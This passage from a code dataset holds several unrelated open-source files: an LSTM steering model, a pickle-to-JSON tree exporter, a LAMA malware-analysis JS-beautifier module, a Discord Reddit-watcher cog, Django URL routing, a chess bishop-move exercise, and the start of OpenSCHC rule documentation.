steering angle based on\n# a constantly changing line of best fit of the center of the road\n# Created by brendon-ai, January 2018\n\n\n# Main function to create model using the number of training timesteps\ndef lstm_steering_model():\n # Create the neural network model using an LSTM followed by fully connected layers\n model = nn.Sequential(\n nn.LSTM(input_size=2, hidden_size=10, num_layers=1),\n TakeFirst(),\n nn.ReLU(),\n nn.Linear(10, 4),\n nn.ReLU(),\n nn.Linear(4, 1)\n )\n\n return model\n","repo_name":"bfmat/LaneDetection","sub_path":"model/lstm_steering_model.py","file_name":"lstm_steering_model.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"6332936471","text":"import pickle\nimport numpy as np\n\nmodel_file_ben = \"wrapper2/ben_r2_0828.mdr\"\nload_ben = pickle.load(open(model_file_ben, 'rb'))\n\nx = load_ben.__reduce__()\n\nes = load_ben.estimators_\n\ndef val_fmt(x):\n if isinstance(x, str):\n return x\n return float(\"{0:.4f}\".format(x))\n\nimport json\n\n\ntrees = []\nfor esi in es:\n # print(esi.tree_.__reduce__())\n d = esi.tree_.__getstate__()\n nodes = d['nodes']\n for nodei in nodes:\n nodei['lb'] = list(map(lambda xi: val_fmt(xi), nodei['lower_bounds'].tolist()))\n nodei['ub'] = list(map(lambda xi: val_fmt(xi), nodei['upper_bounds'].tolist()))\n nodei['ta'] = val_fmt(\"inf\" if nodei['tau'] == np.inf else nodei['tau'])\n nodei['vr'] = val_fmt(nodei['variance'])\n nodei['lc'] = nodei['left_child']\n nodei['rc'] = nodei['right_child']\n nodei['f'] = nodei['feature']\n nodei['th'] = val_fmt(nodei['threshold'])\n\n del nodei['lower_bounds']\n del nodei['upper_bounds']\n del nodei['tau']\n del nodei['variance']\n del nodei['left_child']\n del nodei['right_child']\n del nodei['feature']\n del nodei['threshold']\n\n del nodei['impurity']\n del nodei['n_node_samples']\n del nodei['weighted_n_node_samples']\n\n values = d['values']\n d['values'] = [val_fmt(di[0][0]) for di in values]\n trees.append(d)\n\njstr = json.dumps(trees)\n\nwith open('wrapper2/ben_r2_0828_2.mdr.json', 'w') as f:\n f.write(jstr)\n","repo_name":"wlu-mstr/mondrianforest-regression-prediction","sub_path":"src/main/resources/pickle_to_json.py","file_name":"pickle_to_json.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2316567407","text":"\"\"\"\nJsBeautifier Docker class\n\n\"\"\"\n\n__author__ = \"Valentin Giannini\"\n__copyright__ = \"Copyright 2016, LAMA\"\n__credits__ = [\"\"]\n__license__ = \"GPL\"\n__version__ = \"3\"\n__maintainer__ = \"Valentin Giannini - CSE Team\"\n__email__ = \"cse.contact -at- post.lu\"\n__status__ = \"Production\"\n\n\nimport json\nimport base64\n\nfrom html import escape\n\nfrom lama.utils.type import Type\nfrom lama.analyzer.module import Module\nfrom lama.analyzer.docker_module import DockerModule\nfrom lama.models.indicator import Indicator\n\n\nclass JsBeautifierDocker(DockerModule):\n \"\"\"JsBeautifierDocker class\n\n Args :\n **malware** (malware) : Malware which will be analyzed\n \"\"\"\n\n _module_name = \"JS Beautifier\"\n\n def __init__(self, malware, local_path):\n super().__init__(\"JS Beautifier\", malware, local_path, \"jsbeautifier\")\n\n @Module.dec_parse_result\n def parse_result(self):\n \"\"\"\n Abstract parse_result method.\n It calls when analyze is finished.\n It uptade malware with indicators.\n \"\"\"\n if not self._result:\n return\n\n json_jsbeautify = self.json_decode(self._result)\n if not json_jsbeautify:\n return\n\n if 'code' in json_jsbeautify:\n indicator = Indicator.factory(module_cls_name=self.module_cls_name,\n name=\"code\",\n content_type=Type.BASE64,\n content=json_jsbeautify[\"code\"],\n score=0)\n self._malware.get_module_status(self.module_cls_name\n ).add_indicator(indicator)\n if 'error' in json_jsbeautify:\n indicator = Indicator.factory(module_cls_name=self.module_cls_name,\n name=\"error\",\n content_type=Type.BASE64,\n content=json_jsbeautify[\"error\"],\n score=-1)\n self._malware.get_module_status(self.module_cls_name\n ).add_indicator(indicator)\n\n def html_report(content):\n html = \"
        \"\n for item in content:\n if item.name == \"code\":\n html += \"
        {}
        \".format(escape(base64.b64decode(item.content).decode('utf-8')))\n elif item.name == \"error\":\n html += \"
        {}
        \".format(escape(base64.b64decode(item.content).decode('utf-8')))\n else:\n html += \"LAMA PARSE ERROR\"\n html += \"
        \"\n return html\n","repo_name":"post-cyberlabs/lama","sub_path":"lama/analyzer/modules/jsbeautifier_docker.py","file_name":"jsbeautifier_docker.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"30724164499","text":"from datetime import timedelta, datetime\nimport logging\nfrom typing import List, Dict, Sequence, Set, Iterable, Tuple, AsyncGenerator\n\nimport discord\nfrom discord.ext import commands\n\nfrom kaztron import KazCog, task\nfrom kaztron.config import SectionView\nfrom kaztron.driver import reddit\nfrom kaztron.utils.checks import mod_only\nfrom kaztron.utils.containers import FifoCache\nfrom kaztron.utils.datetime import format_timedelta, utctimestamp\n\nfrom kaztron.utils.embeds import EmbedSplitter\nfrom kaztron.utils.strings import format_list, natural_truncate\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_reddit_scopes():\n return 'identity', 'read'\n\n\nclass SubwatchConfig(SectionView):\n \"\"\"\n :ivar reddit_username: Username to use. If not specified, will use the first logged-in user.\n :ivar check_interval: How often to check a subreddit for new posts.\n :ivar min_post_interval: Minimum time between posts to Discord.\n If more than max_posts_per_interval new Reddit posts are detected, they will be queued up\n and posted at this interval.\n :ivar max_posts_per_interval: Maximum number of Reddit posts to post to Discord at a time. If\n more Reddit posts are detected, they will be queued up and posted every min_post_interval.\n \"\"\"\n reddit_username: str\n check_interval: timedelta\n min_post_interval: timedelta\n max_posts_per_interval: int\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.set_converters('check_interval', self._get_timedelta, self._set_timedelta)\n self.set_converters('min_post_interval', self._get_timedelta, self._set_timedelta)\n\n @staticmethod\n def _get_timedelta(seconds: int):\n return timedelta(seconds=seconds)\n\n @staticmethod\n def _set_timedelta(d: timedelta):\n return d.total_seconds()\n\n\nclass SubwatchChannel:\n def __init__(self, *,\n subreddits: Sequence[str],\n queue: List[str]=tuple(),\n last_posted: datetime):\n self.subreddits = tuple(subreddits)\n self.queue = list(queue)\n self.last_posted = last_posted\n\n def to_dict(self):\n return {\n 'subreddits': self.subreddits,\n 'queue': self.queue,\n 'last_posted': utctimestamp(self.last_posted)\n }\n\n @staticmethod\n def from_dict(data: dict):\n return SubwatchChannel(subreddits=data['subreddits'], queue=data.get('queue', []),\n last_posted=datetime.utcfromtimestamp(data['last_posted']))\n\n\nclass SubwatchState(SectionView):\n \"\"\"\n :ivar queue: Queue of reddit submission IDs for each Discord channel.\n :ivar watch: Discord channels and the subreddit(s) they subwatch.\n \"\"\"\n channels: Dict[discord.Channel, SubwatchChannel]\n last_checked: datetime\n no_results_count: int\n cog: KazCog\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.__dict__['cog'] = None\n self.set_converters('channels', self._get_channels, self._set_channels)\n self.set_converters('last_checked', datetime.utcfromtimestamp, utctimestamp)\n\n def set_cog(self, cog: KazCog):\n self.__dict__['cog'] = cog\n\n def _get_channels(self, data: Dict[str, dict]):\n return {self.cog.get_channel(key): SubwatchChannel.from_dict(channels_dict)\n for key, channels_dict in data.items()}\n\n @staticmethod\n def _set_channels(data: Dict[discord.Channel, SubwatchChannel]):\n return {ch.id: sub.to_dict() for ch, sub in data.items()}\n\n\nclass RedditStreamManager:\n \"\"\"\n Helps manage and cache the submissions stream. Also manages stream failures (e.g. when the\n last retrieved post is deleted, the stream may return no results instead of the latest results\n since the last query).\n\n :param reddit: Reddit instance to use\n :param subreddits: List of subreddit names to check\n :param renewal_threshold: Number of times the stream is checked with no results before\n automatically refreshing (i.e. assumed stream failure).\n \"\"\"\n def __init__(self,\n reddit_: reddit.Reddit,\n subreddits: Iterable[str],\n renewal_threshold=5,\n cache_expiry=180):\n self.reddit = reddit_\n\n self._subreddits = tuple(subreddits)\n self._stream = None\n self._is_fresh = True\n self.no_result_count = 0\n self.renewal_threshold = renewal_threshold\n\n self.submission_cache = FifoCache() # type: Dict[str, Tuple[reddit.models.Submission, int]]\n self.cache_expiry_delta = cache_expiry\n\n @property\n def subreddits(self):\n \"\"\"\n List of subreddit names for this stream. If this list is modified, the stream is refreshed.\n \"\"\"\n return self._subreddits\n\n @subreddits.setter\n def subreddits(self, subreddits: Iterable[str]):\n self._subreddits = tuple(subreddits)\n self.refresh()\n\n @property\n def is_fresh(self):\n \"\"\"\n True if the stream is fresh, i.e., will return a backlog. This property remains true until\n the stream has iterated through the first set of responses from the API, i.e.,\n :meth:`~.stream` has iterated through to its end.\n \"\"\"\n return self._is_fresh\n\n async def stream(self) -> AsyncGenerator[reddit.models.Submission, None]:\n \"\"\"\n Generator of new reddit posts. Should be async iterated.\n\n After a :meth:`~.refresh()`, setting :attr:`~.subreddits`, or hitting the\n :attr:`~.renewal_threshold`, this will load a number of recent posts instead of restarting\n from the latest post.\n \"\"\"\n has_results = False\n if self.is_fresh:\n sr = await self.reddit.subreddit(display_name='+'.join(self.subreddits))\n self._stream = sr.stream.submissions(pause_after=0)\n\n async for submission in self._stream:\n if submission is None:\n if has_results:\n self.no_result_count = 0\n else:\n self.no_result_count += 1\n break\n has_results = True\n self.submission_cache[submission.id] = (submission, utctimestamp(datetime.utcnow()))\n yield submission\n\n self._is_fresh = False\n if self.no_result_count >= self.renewal_threshold:\n self.refresh()\n\n def refresh(self):\n self._stream = None\n self._is_fresh = True\n\n async def get_submission(self, reddit_id: str) -> reddit.models.Submission:\n \"\"\"\n Get the submission from cache or from the reddit API (if not in cache or expired).\n :param reddit_id:\n :return:\n :raise reddit.DeletedError: submission is removed/deleted\n \"\"\"\n try:\n s, load_time = self.submission_cache[reddit_id]\n if utctimestamp(datetime.utcnow()) - load_time > self.cache_expiry_delta:\n await s.load()\n self.submission_cache[reddit_id] = (s, utctimestamp(datetime.utcnow()))\n except KeyError:\n s = await self.reddit.submission(reddit_id)\n self.submission_cache[reddit_id] = (s, utctimestamp(datetime.utcnow()))\n\n if getattr(s, 'removed_by_category', None) is not None:\n raise reddit.DeletedError(s, s.removed_by_category)\n elif not getattr(s, 'is_robot_indexable', True):\n raise reddit.DeletedError(s, 'unknown')\n return s\n\n\nclass QueueManager:\n \"\"\"\n Manage a queue of subreddit posts found and not yet posted.\n\n Note: this class's methods will not mark dirty or write the state file. All mutating methods\n should be called under `with self.cog_state:` contexts to ensure the file is properly updated.\n \"\"\"\n\n def __init__(self, state: SubwatchState):\n self.state = state\n\n def add(self, submission: reddit.models.Submission):\n \"\"\" Add a submission to the queue. \"\"\"\n for ch, ch_info in self.state.channels.items():\n if submission.subreddit.display_name.lower() in ch_info.subreddits:\n ch_info.queue.append(submission.id)\n\n def pop(self, channel: discord.Channel) -> str:\n \"\"\"\n Pop a reddit ID off the channel's queue.\n :raise IndexError: Nothing in queue\n :raise KeyError: Channel is not configured for SubWatch\n \"\"\"\n return self.state.channels[channel].queue.pop(0)\n\n def queue_length(self, channel: discord.Channel) -> int:\n \"\"\"\n Get the length of the a given channel's queue.\n :raise KeyError: Channel is not configured for SubWatch\n \"\"\"\n return len(self.state.channels[channel].queue)\n\n\nclass Subwatch(KazCog):\n \"\"\"!kazhelp\n category: Automation\n brief: Announce new reddit posts in a channel.\n description: |\n This module monitors one or more subreddits and announces new posts to Discord channels.\n\n It is configured to check every {{check_interval}}. It will post a maximum of\n {{max_posts_per_interval}} posts at a time every {{min_post_interval}}, to avoid flooding\n a Discord channel; otherwise, it will queue posts.\n contents:\n - subwatch\n - add\n - reset\n - rem\n \"\"\"\n cog_config: SubwatchConfig\n cog_state: SubwatchState\n\n #####\n # Lifecycle\n #####\n\n def __init__(self, bot):\n super().__init__(bot, 'subwatch', SubwatchConfig, SubwatchState)\n self.cog_config.set_defaults(\n reddit_username=None,\n check_interval=60,\n min_post_interval=300,\n max_posts_per_interval=2,\n )\n self.cog_state.set_defaults(\n channels=dict(),\n last_checked=utctimestamp(datetime.utcnow()),\n no_results_count=0\n )\n self.reddit = None # type: reddit.Reddit\n self.stream_manager = None # type: RedditStreamManager\n self.queue_manager = None # type: QueueManager\n\n async def on_ready(self):\n await super().on_ready()\n self.cog_state.set_cog(self)\n _ = self.cog_state.channels # convert and validate\n self.reddit = reddit.RedditLoginManager().get_reddit(self.cog_config.reddit_username)\n self.stream_manager = RedditStreamManager(self.reddit, self._get_all_subreddits())\n self.queue_manager = QueueManager(self.cog_state)\n\n logger.info(\"Using reddit account: {}\".format((await self.reddit.user.me()).name))\n\n if not self.scheduler.get_instances(self.task_check_reddit):\n delay = timedelta(seconds=15)\n interval = self.cog_config.check_interval\n self.scheduler.schedule_task_in(self.task_check_reddit, delay, every=interval)\n\n def export_kazhelp_vars(self):\n return {\n 'check_interval': format_timedelta(self.cog_config.check_interval),\n 'min_post_interval': format_timedelta(self.cog_config.min_post_interval),\n 'max_posts_per_interval': str(self.cog_config.max_posts_per_interval)\n }\n\n def unload_kazcog(self):\n self.scheduler.cancel_all(self.task_check_reddit)\n self.scheduler.cancel_all(self.task_process_queue)\n\n #####\n # Core\n #####\n\n @staticmethod\n def log_submission(submission: reddit.models.Submission) -> str:\n \"\"\" Format submission info in short form for logs. \"\"\"\n return \"{0.id} on {0.subreddit.display_name} (\\\"{1}\\\")\".format(\n submission, natural_truncate(submission.title, 50)\n )\n\n def _get_all_subreddits(self) -> Set[str]:\n \"\"\" Get the set of all subreddits being watched across all channels. \"\"\"\n subreddits = set()\n for channel, data in self.cog_state.channels.items():\n subreddits.update(data.subreddits)\n return subreddits\n\n async def _post_all_channels(self):\n for channel in self.cog_state.channels.keys():\n await self._post_from_queue(channel)\n\n def schedule_post_from_queue(self, channel: discord.Channel):\n \"\"\"\n If it's too early to post from the queue into this Discord channel, schedules it for later\n and return True. Otherwise, does nothing and return False.\n\n If a posting task for this channel is already scheduled for later, returns True.\n :param channel:\n :return: True if scheduled later, False if not (channel can post now)\n \"\"\"\n # check if already scheduled\n for task_instance in self.scheduler.get_instances(self.task_process_queue):\n if task_instance.args[0] == channel:\n return True\n\n ch_info = self.cog_state.channels[channel]\n next_post_time = ch_info.last_posted + self.cog_config.min_post_interval\n if ch_info.queue and datetime.utcnow() < next_post_time:\n logger.warning(\"Too early to post in #{}: scheduling for later.\".format(channel.name))\n self.scheduler.schedule_task_at(\n task=self.task_process_queue,\n dt=next_post_time,\n args=(channel,)\n )\n return True\n return False\n\n async def _post_from_queue(self, channel: discord.Channel):\n \"\"\"\n Post any queued messages in the channel. This respects the minimum interval between discord\n posts and maximum number of posts per interval configuration settings, and will schedule\n the :meth:`~.task_process_queue` for later if there are too many queued posts.\n\n :param channel: Channel to post in.\n \"\"\"\n # too early to post - do it later\n if self.schedule_post_from_queue(channel):\n return\n\n ch_info = self.cog_state.channels[channel]\n count = 0\n try:\n while count < self.cog_config.max_posts_per_interval:\n try:\n submission_id = self.queue_manager.pop(channel)\n submission = await self.stream_manager.get_submission(submission_id)\n except reddit.DeletedError as e:\n logger.warning(\"Skipping deleted or removed post: {}\"\n .format(self.log_submission(e.args[0])))\n continue\n\n try:\n await self._send_submission(channel, submission)\n except (AttributeError, TypeError, ValueError) as e:\n logger.exception(\"Error posting submission: {}\"\n .format(self.log_submission(submission)))\n await self.send_message(channel, \"Subwatch: Error posting post: {}\"\n .format(submission.id))\n await self.send_output(\"[ERROR] Subwatch: Error posting post in #{}: {}\"\n .format(channel.name, submission.id))\n continue\n count += 1\n except IndexError: # we don't have enough in queue to post; that's fine\n pass\n else: # we did post something\n ch_info.last_posted = datetime.utcnow()\n\n async def _send_submission(self,\n channel: discord.Channel,\n submission: reddit.models.Submission):\n \"\"\" Post a submission to a channel. \"\"\"\n logger.info(\"Posting to #{}: {}\".format(channel.name, self.log_submission(submission)))\n tags = []\n if submission.link_flair_text:\n tags.append(f'[{submission.link_flair_text}]')\n if submission.is_original_content:\n tags.append('[OC]')\n subreddit = '/r/{0}'.format(submission.subreddit.display_name)\n\n desc_parts = [''.join(tags)]\n if submission.is_self:\n desc_parts.append(f'(self.{submission.subreddit.display_name})')\n else:\n desc_parts.append(f'({submission.domain})')\n desc_parts.append('on')\n desc_parts.append(subreddit)\n\n es = EmbedSplitter(\n auto_truncate=True,\n title=submission.title,\n url='https://reddit.com' + submission.permalink,\n timestamp=datetime.utcfromtimestamp(submission.created_utc)\n )\n es.set_footer(text=' '.join(desc_parts))\n es.set_author(name='/u/' + submission.author.name,\n url='https://reddit.com/u/{}'.format(submission.author.name))\n if submission.thumbnail.startswith('http://') or submission.thumbnail.startswith('https://'):\n es.set_thumbnail(url=submission.thumbnail)\n await self.send_message(channel, embed=es)\n\n #####\n # Discord\n #####\n\n @task(is_unique=True)\n async def task_check_reddit(self):\n \"\"\" Checks all subreddits configured. \"\"\"\n sub_set = self._get_all_subreddits()\n\n if not sub_set:\n return # none configured\n\n with self.cog_state as state:\n count = 0\n last_checked = utctimestamp(state.last_checked)\n last_timestamp = last_checked # last processed submission timestamp\n async for submission in self.stream_manager.stream():\n # if an old submission / already checked, skip it\n if self.stream_manager.is_fresh and submission.created_utc <= last_checked:\n continue\n self.queue_manager.add(submission)\n last_timestamp = submission.created_utc\n logger.debug(\"Found post: {}\".format(self.log_submission(submission)))\n count += 1\n if count > 0:\n logger.info(\"Found {} posts in subreddits: {}\".format(count, ', '.join(sub_set)))\n else:\n logger.debug(\"Found 0 posts in subreddits: {}\".format(', '.join(sub_set)))\n # issue #339: if an older post is un-removed and detected, we want to avoid\n # re-posting posts that came after that older post\n if last_timestamp > last_checked:\n state.last_checked = datetime.utcfromtimestamp(last_timestamp)\n await self._post_all_channels()\n\n @task(is_unique=False)\n async def task_process_queue(self, channel: discord.Channel):\n \"\"\" Checks queue of reddit posts to send to Discord channel and posts when possible. \"\"\"\n with self.cog_state:\n await self._post_from_queue(channel)\n\n @commands.group(invoke_without_command=True, pass_context=True, ignore_extra=False)\n @mod_only()\n async def subwatch(self, ctx: commands.Context):\n \"\"\"!kazhelp\n\n brief: Show Subwatch configuration.\n description: Show the current subwatch configuration.\n \"\"\"\n channel_strings = []\n for channel, ch_info in self.cog_state.channels.items():\n channel_strings.append(\"{}: {}\".format(\n channel.mention, ', '.join('/r/' + name for name in ch_info.subreddits)\n ))\n await self.send_message(ctx.message.channel, ctx.message.author.mention + '\\n' +\n (format_list(channel_strings) if channel_strings else 'No subwatch configured'))\n\n @subwatch.command(pass_context=True, ignore_extra=False)\n @mod_only()\n async def add(self, ctx: commands.Context, channel: discord.Channel=None, *,\n subreddits: str=None):\n \"\"\"!kazhelp\n\n brief: Add or edit a channel's sub watches.\n description: Add or change subreddits to watch and post into a channel.\n parameters:\n - name: channel\n type: string\n description: \"Discord channel to output the watched subreddits into.\"\n - name: subreddits\n type: string\n optional: True\n description: \"Subreddits to watch and post in the channel. Can be separated by commas,\n spaces or `+`.\"\n examples:\n - command: \".subwatch add #general askreddit askscience\"\n description: \"Watch the subreddits AskReddit and AskScience and post new posts to\n #general.\"\n \"\"\"\n # preprocess the list\n subs_list_raw = subreddits.replace(',', ' ').replace('+', ' ').split(' ')\n # strip elements, and filter empty elements due to extra whitespace\n subreddits_list = tuple(filter(lambda s: s, (s.strip().lower() for s in subs_list_raw)))\n with self.cog_state as state:\n state.channels[channel] = SubwatchChannel(\n subreddits=subreddits_list,\n last_posted=datetime.utcnow() # issue #340: don't process old posts on new config\n )\n self.stream_manager.subreddits = self._get_all_subreddits()\n logger.info(\"Set channel #{} for subwatch: {}\"\n .format(channel.name, ', '.join('/r/' + s for s in subreddits_list)))\n await self.send_message(ctx.message.channel, ctx.message.author.mention + ' ' +\n \"Set channel {} for subwatch: {}\"\n .format(channel.mention, ', '.join('/r/' + s for s in subreddits_list)))\n\n @subwatch.command(pass_context=True, ignore_extra=False)\n @mod_only()\n async def reset(self, ctx: commands.Context, channel: discord.Channel):\n \"\"\"!kazhelp\n\n brief: Reset a channel's subwatch queue , posting only new posts from now onwards.\n description: |\n Reset a channel's subwatch state, clearing the queue and \"last checked\" data.\n This will cause subwatch to ignore older posts and only post new posts from the time\n this command is issued onward.\n parameters:\n - name: channel\n type: string\n description: \"Discord channel to output the watched subreddits into.\"\n examples:\n - command: \".subwatch reset #general\"\n description: \"\"\n \"\"\"\n with self.cog_state as state:\n current = state.channels[channel]\n subreddits = current.subreddits\n state.channels[channel] = SubwatchChannel(\n subreddits=subreddits, last_posted=datetime.utcnow()\n )\n self.stream_manager.subreddits = self._get_all_subreddits()\n logger.info(\"Reset channel #{} subwatch: {}\"\n .format(channel.name, ', '.join('/r/' + s for s in subreddits)))\n await self.send_message(ctx.message.channel, ctx.message.author.mention + ' ' +\n \"Reset channel {} subwatch: {}\"\n .format(channel.mention, ', '.join('/r/' + s for s in subreddits)))\n\n @subwatch.command(pass_context=True, ignore_extra=False)\n @mod_only()\n async def rem(self, ctx: commands.Context, channel: discord.Channel=None):\n \"\"\"!kazhelp\n\n brief: Remove subwatches from a channel.\n description: Stop watching subreddits in a channel.\n parameters:\n - name: channel\n type: string\n description: \"Discord channel.\"\n examples:\n - command: \".subwatch rem #general\"\n description: \"Stop watching subreddits in #general.\"\n \"\"\"\n try:\n with self.cog_state as state:\n del state.channels[channel]\n except IndexError:\n logger.warning(f'Cannot remove channel #{channel.name}: no subwatch for channel')\n await self.send_message(ctx.message.channel, ctx.message.author.mention + ' ' +\n f'Cannot remove channel {channel.mention}: no subwatch for channel')\n else:\n # clean up scheduled tasks\n for task_instance in self.scheduler.get_instances(self.task_process_queue):\n if task_instance.args[0] == channel:\n task_instance.cancel()\n self.stream_manager.subreddits = self._get_all_subreddits()\n logger.info(f'Removed subwatches in #{channel.name}.')\n await self.send_message(ctx.message.channel,\n ctx.message.author.mention + ' ' + f'Removed subwatches in {channel.mention}.')\n\n\ndef setup(bot):\n bot.add_cog(Subwatch(bot))\n","repo_name":"Worldbuilding/kaztron","sub_path":"kaztron/cog/reddit/subwatch.py","file_name":"subwatch.py","file_ext":"py","file_size_in_byte":23964,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"36410681934","text":"from django.contrib import admin\nfrom django.urls import include, path, re_path\nfrom djoser.views import TokenCreateView\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\nfrom users.views import CustomTokenDestroyView\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/\", include(\"products.urls\", namespace=\"products\")),\n path(\"api/\", include(\"core.urls\", namespace=\"core\")),\n re_path(\n r\"^api/(?P(v1|v2))/auth/token/login/?$\",\n TokenCreateView.as_view(),\n name=\"login\",\n ),\n re_path(\n r\"^api/(?P(v1|v2))/auth/token/logout/?$\",\n CustomTokenDestroyView.as_view(),\n name=\"logout\",\n ),\n]\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Lenta hackathon API\",\n default_version=\"v1\",\n description=\"Документация для бэкенд приложения.\",\n # terms_of_service=\"URL страницы с пользовательским соглашением\",\n contact=openapi.Contact(email=\"kubanez74@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns += [\n re_path(\n r\"^swagger(?P\\.json|\\.yaml)$\",\n schema_view.without_ui(cache_timeout=0),\n name=\"schema-json\",\n ),\n re_path(\n r\"^swagger/$\",\n schema_view.with_ui(\"swagger\", cache_timeout=0),\n name=\"schema-swagger-ui\",\n ),\n re_path(\n r\"^redoc/$\",\n schema_view.with_ui(\"redoc\", cache_timeout=0),\n name=\"schema-redoc\"\n ),\n]\n","repo_name":"kubanez-create/Lenta_TS_backend","sub_path":"foodcast/foodcast/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44182328712","text":"'''\r\nBoolean38 ◦ . Даны координаты двух различных полей шахматной доски x 1 ,\r\ny 1 , x 2 , y 2 (целые числа, лежащие в диапазоне 1–8). Проверить истинность\r\nвысказывания: «Слон за один ход может перейти с одного поля на другое».\r\n'''\r\n\r\nx1 = int(input(\"Введите x1: \"))\r\ny1 = int(input(\"Введите y1: \"))\r\n\r\nx2 = int(input(\"Введите x2: \"))\r\ny2 = int(input(\"Введите y2: \"))\r\n\r\nflag = True\r\n\r\ncolor1 = ''\r\ncolor2 = ''\r\n\r\nif (x1 % 2 == 0 and y1 % 2 != 0) or (x1 % 2 != 0 and y1 % 2 == 0):\r\n\tcolor1 = 'white'\r\nelse:\r\n\tcolor1 = 'black'\r\n\r\nif (x2 % 2 == 0 and y2 % 2 != 0) or (x2 % 2 != 0 and y2 % 2 == 0):\r\n\tcolor2 = 'white'\r\nelse:\r\n\tcolor2 = 'black'\r\n\r\nif color1 == color2:\r\n\tif (abs(x1 - x2)) == (abs(y1 - y2)):\r\n\t\tpass\r\n\telse:\r\n\t\tflag = False\r\nelse:\r\n\tflag = False\r\n\r\nprint(flag)","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"Boolean(40)/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"337545278","text":"\"\"\"\nThe Rule Manager manages the context(s) for a specific device or a set of devices.\nIt maintains the context database and ensures its consistency. The hierarchy is the\nfollowing:\n\n+ context_database\n\n + device_context\n\n + set_of_rules\n\n + rule_id/rule_id_length\n\n + rules\n\n + Fragmentation\n + Compression\n\n------------\nIntroduction\n------------\n\nThe context includes a set of rules shared by both ends.\nIdentical Rules are used on both ends. They can be simply\ncopied/pasted from one end to the other end, if both ends use the same format for describing them.\n\nThis document specifies the OpenSCHC rule data model, which is based on JSON.\n\n---------------\nRule definition\n---------------\n\nA rule is described as a JSON dictionary.\n\nA rule is identified by its RuleID.\n\nThe size of the RuleID representation can change from one rule to\nthe next. Therefore, the rule description includes a RuleIDLength that indicates the length of the RuleID, in bits.\n\nBoth fields are integer numbers::\n\n {\n \"RuleID\" : 12,\n \"RuleIDLength\" : 4\n # notice that RuleID 12 represented on 6 bits is different from RuleID 12 on 4 bits!\n }\n\nIn SCHC, rules are used either for compression or fragmentation. Therefore, one and only one of the two keywords \"fragmentation\" or \"compression\" must be specified, per rule.\n\nCompression Rules\n-----------------\n\nAs defined in the SCHC specification, compression rules are composed of Field Descriptions.\nThe order in which the Field Descriptions appear in the rule is significant (e.g. it defines the order in which the compression residues are sent), therefore a compression rule is represented as an array.\n\nThe Field Description is a dictionary containing the key+data pairs as defined in the SCHC specification:\n\n* **FID**: a string identifying the field of the protocol header that is being compressed. The value of this string is the one returned by the protocol analyzer when encountering said field. E.g. \"IPV6.VER\". <<< why is this not IP.VER instead? It seems to me that IPV6.VER will always be 6!>>>\n* **FL**: if the value is a number, that value expresses the length of the field, in bits. If the \\\nvalue is a string, it designates a function that can compute the field length. The functions currently defined are:\n\n * *var*: the field is of variable length. It will be determined at run time by the protocol analyzer. The length (expressed in bytes) will be transmitted as part of the compression residue. The encoding is described in the SCHC specification.\n * *tkl*: this function is specific for compressing the CoAP Token field. The length of the Token is determined at run time by the protocol analyzer by looking at the Token Length field of he CoAP header.\n\n* **FP**: an integer specifying the position in the header of the field this Field Description applies to. The default value is 1. For each recurrence of the same field in the header, the value is increased by 1.\n* **DI**: tells the direction to which this Field Description applies:\n\n * *Up*: only to uplink messages (i.e. from device to network)\n * *Dw*: only to downlink messages (i.e. from network to device)\n * *Bi*: to both directions\n\n* **TV**: specifies the Target Value. The value is a number, a string or an array of these types. The \"TV\" key can be omitted or its value set to null if there is no value to check, for instance together with the \"ignore\" MO. If the Target Value is an array, then the value null among the array elements indicates that \\\nthe Field Descriptor matches the case where the field is not present in the header being compressed.\n* **MO**: specifies the Matching Operator. It is a string that can take the following values:\n\n * *ignore*: the field must be present in the header, but the value is not checked.\n * *equal*: type and value must check between the field value and the Target Value <<< il y a des champs avec des descriptions explicites de type dans les protocoles considérés ? >>\n * *MSB*: the most significant bits of the Target Value are checked against the most significant bits of the field value. The number of bits to be checked is given by the \"MOa\" field.\n * *match-mapping*: with this MO, the Target Value must be an array. This MO matches when one element of the Target Value array matches the field, in type and value.\n\n* **MOa**: specifies, if applicable, an argument to the MO. This currently only applies to the \"MSB\" MO, where the argument specifies the length of the matching, in bits.\n* **CDA**: designates the Compression/Decompression Action. It is a string that can take the following values:\n\n * *not-sent*: the field value is not sent as a residue.\n * *value-sent*: the field value is sent in extenso in the residue.\n * *LSB*: the bits remaining after the MSB comparison are sent in the residue.\n * *mapping-sent*: the index of the matching element in the array is sent.\n * *compute*: the field is not sent in the residue and the receiver knows how to recover the value from other information. This is generally used for length and checksum.\n\n* **CDAa**: represents the argument of the CDA. Currently, no CDAa is defined.\n\nFor example::\n\n {\n \"ruleID\": 12,\n \"ruleLength\": 4,\n \"compression\": [\n {\"FID\": \"IPV6.VER\", \"FL\": 4, \"FP\": 1, \"DI\": \"Bi\", \"TV\": 6, \"MO\": \"equal\", \"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.TC\", \"FL\": 8, \"FP\": 1, \"DI\": \"Bi\", \"TV\": 0, \"MO\": \"equal\", \"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.FL\", \"FL\": 20,\"FP\": 1, \"DI\": \"Bi\", \"TV\": 0, \"MO\": 